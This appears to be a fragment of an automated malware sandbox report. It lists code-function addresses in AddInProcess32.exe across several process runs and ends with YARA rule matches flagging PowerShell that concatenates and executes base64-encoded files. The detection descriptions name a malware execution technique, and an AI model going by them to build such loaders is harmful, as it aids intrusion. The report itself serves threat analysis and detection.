          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CFDC05_2_018CFDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AADE05_2_018AADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018BAD005_2_018BAD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B3D405_2_018B3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01961D5A5_2_01961D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01967D735_2_01967D73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01950CB55_2_01950CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196FCF25_2_0196FCF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A0CF25_2_018A0CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B0C005_2_018B0C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01929C325_2_01929C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B1F925_2_018B1F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196FFB15_2_0196FFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A2FC85_2_018A2FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018BCFE05_2_018BCFE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196FF095_2_0196FF09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018F2F285_2_018F2F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D0F305_2_018D0F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01924F405_2_01924F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196CE935_2_0196CE93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C2E905_2_018C2E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B9EB05_2_018B9EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196EEDB5_2_0196EEDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0196EE265_2_0196EE26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B0E595_2_018B0E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF600A14_2_00DF600A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E3600014_2_00E36000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DE010014_2_00DE0100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E702C014_2_00E702C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF053514_2_00DF0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E0C6E014_2_00E0C6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DEC7C014_2_00DEC7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF077014_2_00DF0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E1475014_2_00E14750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E1E8F014_2_00E1E8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DD68B814_2_00DD68B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E2889014_2_00E28890
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF284014_2_00DF2840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DFA84014_2_00DFA840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF29A014_2_00DF29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E0696214_2_00E06962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DEEA8014_2_00DEEA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DE0CF214_2_00DE0CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF0C0014_2_00DF0C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF8DC014_2_00DF8DC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DEADE014_2_00DEADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E08DBF14_2_00E08DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DFED7A14_2_00DFED7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DFAD0014_2_00DFAD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E02E9014_2_00E02E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF0E5914_2_00DF0E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DE2FC814_2_00DE2FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E6EFA014_2_00E6EFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E64F4014_2_00E64F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E32F2814_2_00E32F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E10F3014_2_00E10F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DFB1B014_2_00DFB1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E2516C14_2_00E2516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DDF17214_2_00DDF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E0D2F014_2_00E0D2F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E0B2C014_2_00E0B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF52A014_2_00DF52A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF33F314_2_00DF33F3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DDD34C14_2_00DDD34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E374E014_2_00E374E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF349714_2_00DF3497
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DE146014_2_00DE1460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DFB73014_2_00DFB730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF38E014_2_00DF38E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E5D80014_2_00E5D800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF599014_2_00DF5990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF995014_2_00DF9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E0B95014_2_00E0B950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E63A6C14_2_00E63A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E65BF014_2_00E65BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E2DBF914_2_00E2DBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E0FB8014_2_00E0FB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E09C2014_2_00E09C20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E69C3214_2_00E69C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00E0FDC014_2_00E0FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF3D4014_2_00DF3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF9EB014_2_00DF9EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00DF1F9214_2_00DF1F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0182010019_2_01820100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0187600019_2_01876000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_018B02C019_2_018B02C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0183053519_2_01830535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0182C7C019_2_0182C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0185475019_2_01854750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0183077019_2_01830770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0184C6E019_2_0184C6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_018329A019_2_018329A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0184696219_2_01846962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0186889019_2_01868890
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_018168B819_2_018168B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0185E8F019_2_0185E8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0183284019_2_01832840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0183A84019_2_0183A840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0182EA8019_2_0182EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01848DBF19_2_01848DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01838DC019_2_01838DC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0182ADE019_2_0182ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0183AD0019_2_0183AD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0183ED7A19_2_0183ED7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01820CF219_2_01820CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01830C0019_2_01830C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_018AEFA019_2_018AEFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01822FC819_2_01822FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01872F2819_2_01872F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01850F3019_2_01850F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_018A4F4019_2_018A4F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01842E9019_2_01842E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01830E5919_2_01830E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0183B1B019_2_0183B1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0186516C19_2_0186516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0181F17219_2_0181F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_018333F319_2_018333F3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0181D34C19_2_0181D34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_018352A019_2_018352A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0184B2C019_2_0184B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0184D2F019_2_0184D2F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0183349719_2_01833497
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_018774E019_2_018774E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0182146019_2_01821460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0183B73019_2_0183B730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0183599019_2_01835990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0183995019_2_01839950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0184B95019_2_0184B950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_018338E019_2_018338E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0189D80019_2_0189D800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0184FB8019_2_0184FB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_018A5BF019_2_018A5BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0186DBF919_2_0186DBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_018A3A6C19_2_018A3A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_0184FDC019_2_0184FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01833D4019_2_01833D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01849C2019_2_01849C20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_018A9C3219_2_018A9C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01831F9219_2_01831F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 19_2_01839EB019_2_01839EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019E010023_2_019E0100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A3600023_2_01A36000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A702C023_2_01A702C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F053523_2_019F0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019EC7C023_2_019EC7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F077023_2_019F0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A1475023_2_01A14750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A0C6E023_2_01A0C6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F29A023_2_019F29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A0696223_2_01A06962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019D68B823_2_019D68B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A2889023_2_01A28890
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A1E8F023_2_01A1E8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F284023_2_019F2840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019FA84023_2_019FA840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019EEA8023_2_019EEA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A08DBF23_2_01A08DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F8DC023_2_019F8DC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019EADE023_2_019EADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019FAD0023_2_019FAD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019FED7A23_2_019FED7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019E0CF223_2_019E0CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F0C0023_2_019F0C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A6EFA023_2_01A6EFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019E2FC823_2_019E2FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A32F2823_2_01A32F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A10F3023_2_01A10F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A64F4023_2_01A64F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A02E9023_2_01A02E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F0E5923_2_019F0E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019FB1B023_2_019FB1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A2516C23_2_01A2516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019DF17223_2_019DF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F33F323_2_019F33F3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019DD34C23_2_019DD34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F52A023_2_019F52A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A0D2F023_2_01A0D2F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A0B2C023_2_01A0B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F349723_2_019F3497
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A374E023_2_01A374E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019E146023_2_019E1460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019FB73023_2_019FB730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F599023_2_019F5990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F995023_2_019F9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A0B95023_2_01A0B950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F38E023_2_019F38E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A5D80023_2_01A5D800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A0FB8023_2_01A0FB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A65BF023_2_01A65BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A2DBF923_2_01A2DBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A63A6C23_2_01A63A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A0FDC023_2_01A0FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F3D4023_2_019F3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A09C2023_2_01A09C20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_01A69C3223_2_01A69C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F1F9223_2_019F1F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_019F9EB023_2_019F9EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 0189B970 appears 268 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 01877E54 appears 97 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00E5EA12 appears 37 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 0189EA12 appears 37 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 0191EA12 appears 86 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 018E5130 appears 36 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 01A37E54 appears 97 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 018F7E54 appears 91 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 0192F290 appears 105 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 01A5EA12 appears 37 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00E37E54 appears 97 times
          Source: amsi64_5960.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: amsi64_5264.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: amsi64_2056.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: amsi64_3780.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: amsi64_5256.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: amsi64_5368.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: amsi64_6068.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: amsi64_1596.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: amsi64_4392.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: amsi64_6780.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
